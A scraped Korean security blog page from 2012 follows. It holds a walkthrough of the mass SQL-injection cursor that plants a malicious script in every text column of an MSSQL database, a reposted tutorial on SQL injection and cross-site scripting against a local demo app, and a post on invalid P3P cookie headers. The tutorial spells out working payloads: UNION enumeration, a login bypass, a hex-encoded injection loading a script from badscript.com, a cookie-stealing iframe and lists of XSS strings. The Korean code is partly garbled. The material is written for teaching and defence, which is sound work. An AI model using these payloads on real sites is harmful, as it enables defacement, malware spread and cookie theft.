암호화된 url 복호화 : http://ddecode.com/phpdecoder/?results=4e57b421cfdfc940c3df55c2bbecb408
| 스크립트 삽입. (0) | 2012.10.24 |
|---|---|
| 윈도우 서비스가 사용하는 포트 총정리 (0) | 2012.03.05 |
| 중국 해커들이 자주쓰는 해킹 명령어 (0) | 2012.02.23 |
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
항상 문서와 자료는 읽어보라고 있는건데 읽지않고 모아두는 것은 단지 자랑하기 위해서 존재하는 허위허식에서 나오는 것이 아닐까...그러므로 난 잘못한것이다..한번 올리는겸 읽어봐야겠다. 에거....반성의 시간
-----------------------------------------------------------------------------------------------------
//목적은 DB에서 사용자가 만든 모든 테이블 중 데이터 타입이 텍스트인 컬럼을 골라
악성코드 삽입 사이트로 이동하려는 스크립트( )를 삽입하려는 것입니다.
sql문은 T-SQL 문법이 사용되었으며 대상 DBMS는 MSSQL입니다.
////////////////삽입된 SQL 문//////////////////////////////
;declare @t varchar(255), @c varchar(255)
declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumn b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor
fetch next from table_cursor into @t, @c
while(@@fetch_status=0)
begin
exec('update ['+@c+']=rtrim
cast( as varchar(53))')
fetch next from table_cursor into @t,@c
end
close table_cursor
dealocate table_cursor;
///////////////////////////////////////////////////////////////
**********************설명***************************
;declare @t varchar(255), @c varchar(255)
//웹페이지의 변수에서 sql문을 끝내기 위해 ; 입력 , varchar타입 255크기의 t, c 변수선언
declare table_cursor cursor for select a.name, b.name from sysobjects a, syscolumn b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
// 시스템정보를 가지고있는 테이블 조회(sysobjects, syscolumn)
// sysobjects 테이블의 xtype='u'인 테이블은 데이터베이스내에 사용자가 만든 테이블을 의미
//syscolumn의 xtype은 99 : ntext, 35 : text, 231 : nvarchar, 167 : varchar 로
//테이블의 각 칼럼의 타입이 문자열 형인것을 찾아서 반환해주는것을 의미
open table_cursor //셀렉트문이 있는 커서를 염
fetch next from table_cursor into @t, @c
//커서에 대한 테이블이름을 t로 넣고 컬럼명을 c 변수로 넣음
while(@@fetch_status=0) //커서가 열려있을경우 시작
begin //루프시작
exec('update ['+@c+']=rtrim // 오른쪽 공백 삭제
(convert(varchar(4000),['+@c+]))+ //해당 컬럼의 데이터형을 varchar(4000)으로 변경
cast( as varchar(53))')
//삽입하려는 악성코드 삽입 사이트 문자열을 varchar(53)형으로 바꿈
fetch next from table_cursor into @t,@c //다음 테이블과 컬럼 가져오기 루프
end
close table_cursor //커서닫기
dealocate table_cursor; //커서 제거
*********************************************************************
이상입니다 수고하십시오~
| Malware Hidden Inside JPG EXIF Headers (0) | 2013.07.17 |
|---|---|
| 윈도우 서비스가 사용하는 포트 총정리 (0) | 2012.03.05 |
| 중국 해커들이 자주쓰는 해킹 명령어 (0) | 2012.02.23 |
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
| Malware Hidden Inside JPG EXIF Headers (0) | 2013.07.17 |
|---|---|
| 스크립트 삽입. (0) | 2012.10.24 |
| 중국 해커들이 자주쓰는 해킹 명령어 (0) | 2012.02.23 |
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
| 스크립트 삽입. (0) | 2012.10.24 |
|---|---|
| 윈도우 서비스가 사용하는 포트 총정리 (0) | 2012.03.05 |
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
| Facebook and many other sites also bypass Internet Explorer privacy controls (0) | 2012.02.21 |
| 윈도우 서비스가 사용하는 포트 총정리 (0) | 2012.03.05 |
|---|---|
| 중국 해커들이 자주쓰는 해킹 명령어 (0) | 2012.02.23 |
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
| Facebook and many other sites also bypass Internet Explorer privacy controls (0) | 2012.02.21 |
| On Null Byte Poisoning and XPath Injection (0) | 2012.01.24 |
For the past couple months, I was helping on patching up several legacy web applications from the Cross-Site Scripting and SQL Injection vulnerabilities. I found lots of articles regarding this topic through Google but reading and experiment with it are virtually two different things. So I decided to put together a small sample code to examine the vulnerabilities that I found. You are welcome to download this sample code.
12/20/2010 – Added example to demonstrate JavaScript Event injection vulnerability.
Cross-Site Scripting (XSS or CSS)
• Enables malicious attackers to inject client-side script (JavaScript) or HTML markup into web pages viewed by other users.
SQL Injection
• Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.
• Very common with PHP and Classic ASP applications.
SQL Injection and Cross-Site Scripting attack are not relatively new topic. Read more about it from:
• Cross-Site Scripting
• SQL Injection –MSDN
• SQL Injection – Wikipedia
The mentioned vulnerabilities can happens via the
1. Query string
2. Form input box
1. Create a new database and name in TestDB.
2. Create a new login and map it to TestDB.
3. Run the TestDBSetup.sql.
1. This sample code requires Visual Studio 2008 or newer, if you don’t have it, download the 90-day trial edition from Microsoft (Click Here).
2. Download the sample code and unzip it.
3. Update the connectionString in the web.config.
4. Run the application and follow the sample described in this article. Make sure to remove any line break from the sample URL when copy and paste.
5. Shown below is the structure of the sample code.
Figure 1
Definition: Insertion of a SQL query via the input data from the client to the application that are later passed to an instance of SQL Server for parsing and execution.
We will use the UNION statement to mine all the table names in the database. The two consecutive hyphens “–” indicates the SQL comments. See below, the comments are in green color, the query statement after the hyphens will not evaluated by the SQL server.
Listing 1
Execute the URL shown below.
Listing 2
It will yield the results “All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.” This error message emerges if we try to run a UNION, INTERSECT or EXCEPT query that has not an equal number of expressions in their SELECT list sections. The work around is to keep adding the NULLexpression in the URL until the error message disappears.
Listing 3
The error message will disappears if the query has equal number of expression in the UNION query. Next, try to replace each of the NULL value with TABLE_NAME. If you get an error message, leave it NULL.
Listing 4
Results
Figure 2
From the output displayed above, we know that the database contains several tables namely MyComments, tbl_SQLInjection, tbl_users and TestTable.
Next, we will extract every columns name in tbl_users table. Execute the URL shown in listing 5.
Listing 5
Result
Figure 3
From the output displayed above, we witnessed that the tbl_users contains address, password, phone, secret, secret2 and username columns. To confirms that, shown below is the snapshot of tbl_users table schema from the SQL server.
Figure 4
Repeat the same step with different table name.
Listing 6
Let retrieve the data stored in tbl_users table. The %2b and %27 are the URL encoding of the “+” and “‘” character respectively. Execute the URL shown below with the string highlighted in grey.
Listing 7
Results
Figure 5
To confirms that, shown below is the snapshot of tbl_users table contents. Repeat the same step for the rest of the tables.
Figure 6
We also can retrieve the SQL server instance name, login name, database name, SQL server version, and etc… from themaster..sysprocesses table. Execute the URL below and observe the output.
Listing 8
Listing 9
Result
Figure 7
Listing 10
Listing 11
Listing 12
Once in a while, we will see some strange entries as listed below in the server log file.
Listing 13
Which when decoded to string will becomes (PLEASE DO NOT COPY AND RUN THIS QUERY)
Listing 14
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://badscript.com/bad.js"> </script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://badscript.com/bad.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The above query will find all the text columns in the table of each database and append a malicious script to it.
Shown below is a URL with a query string to retrieve comment from the SQL server by comment id.
For the sake of simplicity, I’m using a simple update statement to update the table. The “UPDATE dbo.MyComments SET test=’HACKED’” query will look like 0x5550444154452064626f2e4d79436f6d6d656
e74732053455420746573743d274841434b454427 in hexadecimal. The %3b is the URL encoding of the “;” character. Append the string highlighted in grey to the URL. See below.
Listing 15
Before executing the above URL
Figure 8
After executing the above URL
Figure 9
Append the below string to your web pages URL that take parameters.
Listing 16
If the URL parameter value is not an integer, try append ‘; or ‘); or ; in front of the DECLARE keyword. See below for an example.
Listing 17
Then, execute this query “SELECT * FROM dbo.tbl_SQLInjection” in SQL Server Management Studio. If you see the results similar to the one shown below, then the web page is subjected to Hex based SQL Injection. Repeat the above step for the rest of the web pages.
Figure 10
If the URL parameter value is not an integer, try append ‘; or ‘); or ; in front of the query.
Definition: Enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.
Let say we have a login page and it will display an error message for every unsuccessful attempt. The error message is stored within the query string of the URL and later display in the Label control. See figure 11.
Figure 11
Consider this scenario, an anonymous user sends you an email with the following content:
Listing 18
The part of the URL highlighted in grey is encoded in Hexadecimal value. When decoded, it will become
Listing 19
If we let our guard down and click on the link in the email, the browser will execute the malicious scripts. Execute the URL and you should see a pop-up message. Shown below is a script embedded in the query string to steal browser cookies.
Listing 20
When decoded, it will look like:
Listing 21
The script will embed an IFRAME on to the page and pointing to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter “c”. This parameter holds the cookies value created by the “SQLInjection_XSS_Demo” application. To demonstrate this, I created few cookies on the LoginPage.aspx. The cookiemonster.aspx will record all the cookies names and values in the CookieJar.txt.
Listing 22
void FakeCookies() { Response.Cookies["email"].Value = "bryian.tan@mydomain.com"; Response.Cookies["email"].Expires = DateTime.Now.AddDays(1); Response.Cookies["age"].Value = "22"; Response.Cookies["age"].Expires = DateTime.Now.AddDays(1); }
After executing the above URL, we will see the below entries in the CookieJar.txt.
Figure 12
So what? What is the attacker going to do with my cookies information? Let say the page will store some information in the cookies after successful login attempt. Login using one of the username found in the tbl_users table then refresh the web page. The page will pull out some information from the cookies and display the results on to the page. See below.
Figure 13
We already know the tables and columns name from the previous example. Execute the URL shown in listing 23 to update the MyComment table with a JavaScript to tamper the cookies. This script will inject a script into the cookies value. Then navigate to the ListComments.aspx page to trigger the script and navigate back to LoginPage.aspx. You should see a popup message “XSS from bad host” indicates that the script was successfully executed by the browser.
Listing 23
Let append some malicious scripts to the MyComment table. Execute the URL shown below.
Listing 24
The URL string highlighted in grey, which when decoded, will becomes
Listing 25
Refresh the page, and we will see a popup message shown below. This indicates that the malicious script crafted by the attacker was successfully executed by the browser.
Figure 14
The URL shown below will embed a HTML IFrame on to the page and will trigger the cookiemonster.aspx page every time a user navigates to the ListComments.aspx page. Execute it, navigate to ListComments.aspx page and observe that new contents are being appended to the CookieJar.txt file without a trace or warning message.
Listing 26
Append any of the below string highlighted in grey to your web pages URL that take parameters. If you see a pop-up message, then the web page is subjected to Cross-Site Scripting attack.
• http://localhost:1234/Sample/LoginPage.aspx?strErr=”><scrIpt>alert(“XSS”)</scriPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58
%53%53%22%29%3C%2F%73%63%72%69%70%74%3
• http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert(“XSS”);</SCRIPt>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert(“XSS”)>
• http://localhost:1234/Sample/LoginPage.aspx?strErr=”><iFRAME%20SRC=”javascript:alert(‘XSS’);”></IFRaME>
We can bypass the login page by simply adding ‘ or 1=1 – to the login id and place any value in the password field. See example below.
Figure 15
If there are no maximum number of characters defined on the TextBox, the attacker can append the SQL statement mentioned above to the form input’s value. Let’s say we have a page to update the comment and I update the comment with the value shown below. We should see a new entry in the tbl_SQLInjection table after the update.
Listing 27
Next, I’ll demonstrate a simple way an attacker can update every column in the table with the same value. Let’s update the Name value with hacked ‘;–
Figure 16
Retrieve all the rows from the MyComments table and witness that all the value in name column were updated to “hacked”. As mentioned earlier, the two consecutive hyphens “–” indicates the SQL comments, the query statement after the hyphens will not evaluated by the SQL server. Please make sure to backup the database before replicating this demonstration.
Figure 17
Cross-Site Scripting enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users. This can happen through the input form. Update the comment with the string “<script src=”http://localhost:9997/badhost/maliciousscript.js”></script>“. You should see a pop-up message when you navigate toListComments.aspx page.
Figure 18
Update the form value with any of the string listed below and observe the outcome. Make sure the string is in one line and no line break. If the JavaScript executes successfully by the browser or displays unexpected result then the web page is subjected to Cross-Site scripting.
• <BODY ONLOAD=”javascript:window.location=”http://www.google.com””>
• <BODY ONLOAD=”javascript:alert(”XSS”)”>
• <p onmouseover=javascript:window.location=”http://www. google.com”;>test
• <p onmousemove=javascript:window.location=”http://www. google.com”;>test
• <p onMouseDown=javascript:window.location=”http://www.google.com”;>test
• <span onmouseover=javascript:window.location=”http://www. google.com”;>test</span>
• <span onmousemove=javascript:window.location=”http://www.google.com”;>test</span>
• <h2 onmouseover=javascript:window.location=”http://www.google.com”;>test
• <div onmouseover=javascript:window.location=”http://1208929383″;>test
• <meta http-equiv=”refresh” content=”1; URL=http://1208929383″>
• <b onmouseover=javascript:window.location=”http://www.google.com”; >test
• <img onmouseover=javascript:window.location=”http://www.google.com”;>
• <img src=http://www.google.com/images/srpr/nav_logo14.png width=”1″ height=”1″ onLoad=javascript:window.location=”http://www.google.com”;>
• <div style=”width:100%” onresize=javascript:window.location=”http://www.google.com”;>test</div> (Resize the browser to see the behavior)
• <tt style=”width:100%” onmousemove=javascript:window.location=”http://www.google.com”;>test
• <PLAINTEXT> test
• <object> test
• <applet> test
• <textarea> test
• <title> test
• <table> test
• <style> test
• <noscript> test
The JavaScriptFunctionInjection.aspx page contains two examples on how to replicate the JavaScript Event Injection vulnerability using ASP.NET inline tag and client-side input control. The first example is using single quote and the second example is using quote. See figure 19. This vulnerability will work with ASP.NET TextBox control if the ValidateRequest is set to false. Copy one of the sample test input and hit the submit button (see figure 19).
Figure 19
Type something in the input box and you should see the result similar to figure 20. Note: The output from the first example was encoded and the single quote was replaced with double single quote on purpose.
Figure 20
What is going on? We have encoded the output and replaced the single quote with double quote! Let take a closer look at the HTML markup code. The JavaScript Event was successfully being injected to the first example but treated as a string by the second example. The HtmlEncode method did not escape the single quote but the quote correctly. I would suggest avoiding wrapping the ASP.NET inline code in between the single quote. Don’t forget to test the second example. The output from the second example was not being encoded on purpose.
Listing 28
<input id="Text1" name="Text1" type="text" value='a'' onKeyDown=alert("gotcha+onKeyDown") ''' /> <input id="Text2" name="Text2" type="text" value="a'' onKeyDown=alert("gotcha+onKeyDown") ''" />
The attacker can bypass the client-side validation by disabling the JavaScript in web browsers. Do not depend exclusively on JavaScript to search and replace potentially dangerous HTML statement or SQL Injection keywords. Make sure to revalidate the user inputs at the server-side. I know is a lot of work, but for the sake of security we have to do it. In the add comment section, the page is using the JavaScript to check for blank fields. Try to disable the JavaScript on your browser and add the comment again. Click here to learn on how to disable and enable the JavaScript.
I saw some web site mentioning that SQL Injection vulnerability can be prevented by simply replacing single quotation mark with double quotation mark. That not always the case, the attackers still able to inject the SQL table with malicious script or HTML markup without the single quotation mark. Malicious users can bypass the filter by using different character encoding, please refer to “How To: Prevent Cross-Site Scripting in ASP.NET“, table 1.
There are several ways to display information from an ASP.NET program. We can display information in the page using an embedded code block. <% … %> or using <%= … %> construction. Another way is to use data-binding syntax <%# … %> to bind control property values to data and specify values for retrieving, updating, deleting, and inserting data. Make sure to apply either the HttpUtility.HtmlEncode or Server.HtmlEncode methods to encode the form data and other client request before displaying it in the web page. This will help prevent possible Cross-Site Scripting injection attacks. With ASP.NET 4.0, the new <%: … %> code nugget-syntax will automatically HTML encode the output before it is rendered.
I’m using stored procedure in my web application, are stored procedures immune to SQL Injection attacks? The answer is “it depends”. If we are using dynamic SQL statements within stored procedure then it might open to SQL Injection attacks. Shown below is the stored procedure with dynamic SQL statement in it.
Figure 21
Update the comment field with the value ha ha ha’;–. The “Update using inline query” and “Update using SP – Dynamic Query” button will update every comment field in the table with the specified value. On the other hand, the “Update using SP” button will only update the current record.
Figure 22
Please note that the ValidateRequest attribute in the @page directive is set to false on purpose to emulate the Classic ASP environment and prevent the .NET framework from throwing the error (“A potentially dangerous Request.Form value was detected from the client”). If you happen to come across this error message in your application, rethink the business logic or page architecture before disabling the request validation.
Adding Cross-Site Scripting Protection to ASP.NET 1.0
ASP.NET 2.0 Security Best Practices – Must Read Article on MSDN
How To: Prevent Cross-Site Scripting in ASP.NET
Security Practices: ASP.NET Security Practices at a Glance
SQL Injection
SQL Injection General Guidance
Stop SQL Injection Attacks Before They Stop You
I hope someone will find this information useful. If you find any bugs or disagree with the contents, please drop me a line and I’ll work with you to correct it. I would suggest downloading the demo and explore it in order to grasp the full concept of it. Please send me an email if you want to help improve this article.
ASCII/HEX/HTML table
Cross Site Scripting
Data-Binding Expressions Overview
How To: Prevent Cross-Site Scripting in ASP.NET
SQL Injection cheat sheet
SQL Injection Walkthrough
String to hex
XType Datatype
Source http://blog.ysatech.com/post/2010/08/16/SQL-Injection-and-Cross-Site-Scripting.aspx
527 views| 중국 해커들이 자주쓰는 해킹 명령어 (0) | 2012.02.23 |
|---|---|
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
| Facebook and many other sites also bypass Internet Explorer privacy controls (0) | 2012.02.21 |
| On Null Byte Poisoning and XPath Injection (0) | 2012.01.24 |
| base64 복호화 사이트 (0) | 2012.01.24 |
There is a post today on a Microsoft MSDN blog about how Google bypasses third-party cookie control in Internet Explorer by setting a false P3P header. The post author is Dean Hachamovitch, who is the VP for IE, and follows up from a big story last week about how Google and a number of other ad networks are bypassing third-party cookie blocking in Safari by using a workaround (the workaround involves an IFRAME and a form that is submitted automatically using Javascript).
The case with IE is different. Google (and many other sites) are taking advantage of the P3P protocol (a privacy extension to HTTP) to set third-party cookies. Here is a summary of what Google is doing, from the article:
By default, IE blocks third-party cookies unless the site presents a P3P Compact Policy Statement indicating how the site will use the cookie and that the sites use does not include tracking the user.
Here is what a valid P3P header looks like, as set by microsoft.com:
$ nc microsoft.com 80
HEAD / HTTP/1.1
Host: www.microsoft.com
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 21 Feb 2012 04:29:06 GMT
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Location: http://www.microsoft.com
Content-Length: 23
Content-Type: text/html
Cache-control: privateIf an invalid P3P header is set, or a header that doesn't state policy, Internet Explorer will by default accept the third-party cookies (this doesn't happen in IE9). This is what the P3P header looks like for google.com:
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."Not mentioned in the Microsoft article is that Facebook are also setting an invalid header ('invalid' may not be the right terminology here, but they are setting a header that does not contain valid privacy policies). This results in Internet Explorer (pre version 9) accepting the third-party cookies.
From facebook.com:
$ nc facebook.com 80
GET / HTTP/1.1
Host: www.facebook.com
HTTP/1.1 302 Found
Location: http://www.facebook.com/common/browser.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: datr=FxdDTzq9li7A7DRTAxVSXaZN; expires=Thu, 20-Feb-2014 04:01:27 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Debug: 8V3X/HiIi+1PrEZFy4c8LpavYxpBvnsojJ+pcYyGJUg=
X-Cnection: close
Date: Tue, 21 Feb 2012 04:01:27 GMT
Content-Length: 0The reason Facebook gives for this header in the page that is linked from it is:
The organization that established P3P, the World Wide Web Consortium, suspended its work on this standard several years ago because most modern web browsers do not fully support P3P. As a result, the P3P standard is now out of date and does not reflect technologies that are currently in use on the web, so most websites currently do not have P3P policies.
Microsoft explicitly called out Google for their behaviour but either neglected to mention or didn't investigate Facebook (skeptics may believe that this is because of Microsoft's shareholding in Facebook and their partnerships in search and advertising (HT ashk4n)).
If Google is being asked to set proper P3P headers (and it appears that they have already altered at least some of their servers) then Facebook should also he held to the same standard.
We plan on surveying other popular sites to find who else is taking advantage of this loophole in P3P and its implementation to bypass third-party cookie controls in earlier Internet Explorer versions. Update: see below. I plan on running a more thorough survey of the top domains.
I looked up the Shodan Research HTTP archive to estimate how many other sites are bypassing Internet Explorer privacy controls for third-party cookies by setting an invalid P3P policy.
The database contains all the HTTP headers for the top 10,000 websites according to Alexa. The relevant headers (P3P, p3p, etc.) show that almost 500 sites are setting invalid P3P headers - almost a full 5% of the top 10,000 web servers surveyed.
| 추가 기능 관리 점검을 통한 Internet Explorer 웹 브라우저 실행 불가능 문제 해결하기 (0) | 2012.02.22 |
|---|---|
| SQL Injection and Cross-Site Scripting (0) | 2012.02.21 |
| On Null Byte Poisoning and XPath Injection (0) | 2012.01.24 |
| base64 복호화 사이트 (0) | 2012.01.24 |
| VBScript.Encode 즉 스크립트 디코드 되어있는거??!!!! (0) | 2011.10.18 |